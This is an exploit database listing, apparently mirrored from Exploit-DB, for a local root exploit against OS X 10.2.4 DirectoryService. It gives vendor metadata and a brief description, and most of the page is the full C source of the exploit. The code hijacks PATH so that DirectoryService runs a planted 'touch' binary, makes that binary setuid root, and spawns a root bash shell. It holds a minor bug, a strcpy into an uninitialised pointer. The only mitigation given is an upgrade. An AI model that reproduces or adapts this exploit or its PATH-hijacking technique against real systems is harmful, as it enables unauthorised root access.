header-logo
Suggest Exploit
vendor:
OS X
by:
Neeko Oni
7,2
CVSS
HIGH
DirectoryService local root PATH exploit
N/A
CWE
Product Name: OS X
Affected Version From: OS X 10.2.4 and earlier
Affected Version To: OS X 10.2.4 and earlier
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Mac
2003

OS X <= 10.2.4 DirectoryService local root PATH exploit

This exploit allows a local user to gain root privileges on OS X 10.2.4 and earlier. DirectoryService must be crashed prior to execution. The exploit compiles a code as 'touch' and executes it. If the euid is root, it will execute a bash shell. If not, it will set the PATH environment variable to '.', execute DirectoryService with the false PATH, pause for 3 seconds, restore the PATH environment variable, and execute the 'touch' code.

Mitigation:

Upgrade to OS X 10.2.5 or later.
Source

Exploit-DB raw data:

/* 
   OS X <= 10.2.4 DirectoryService local root PATH exploit
   DirectoryService must be crashed prior to execution, per
   @stake advisory.  If you discover how to crash DirectoryService
   e-mail me at neeko@haackey.com  [Neeko Oni]

--
Assuming DirectoryService has been crashed/killed, compile
this code as 'touch' (gcc osxds.c -o touch) and execute.

bash$ ./touch
*bunch of stuff here*
euid is root.
bash#

*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

int 
main(int argc, char **argv)
{
	char           *ORIGPATH;
	int             temp;
	if (argc < 2) {
		if (geteuid() == 0) {
		printf("euid is root.\n");
		setuid(0);
		execl("/bin/bash", "bash", NULL);
		}
		strcpy(ORIGPATH, getenv("PATH"));
		printf("Original path: %s\n", ORIGPATH);
		setenv("PATH", ".", 1);
		printf("New path: %s\n", getenv("PATH"));
		printf("Executing DirectoryService with false PATH...\n");
		if (fork() == 0) {
			execl("/usr/sbin/DirectoryService", "DirectoryService", NULL);
		}
		printf("Forked DirectoryService, pausing before shell exec...\n");
		sleep(3);
		printf("Cross your fingers.\n");
		setenv("PATH", ORIGPATH, 1);
		printf("Path restored: %s\n", getenv("PATH"));
		execl("./touch", "touch", NULL);		
	}
system("/usr/sbin/chown root ./touch;/bin/chmod +s ./touch");
}

// milw0rm.com [2003-04-18]

Navigation

Suggest Exploit

Services By CQR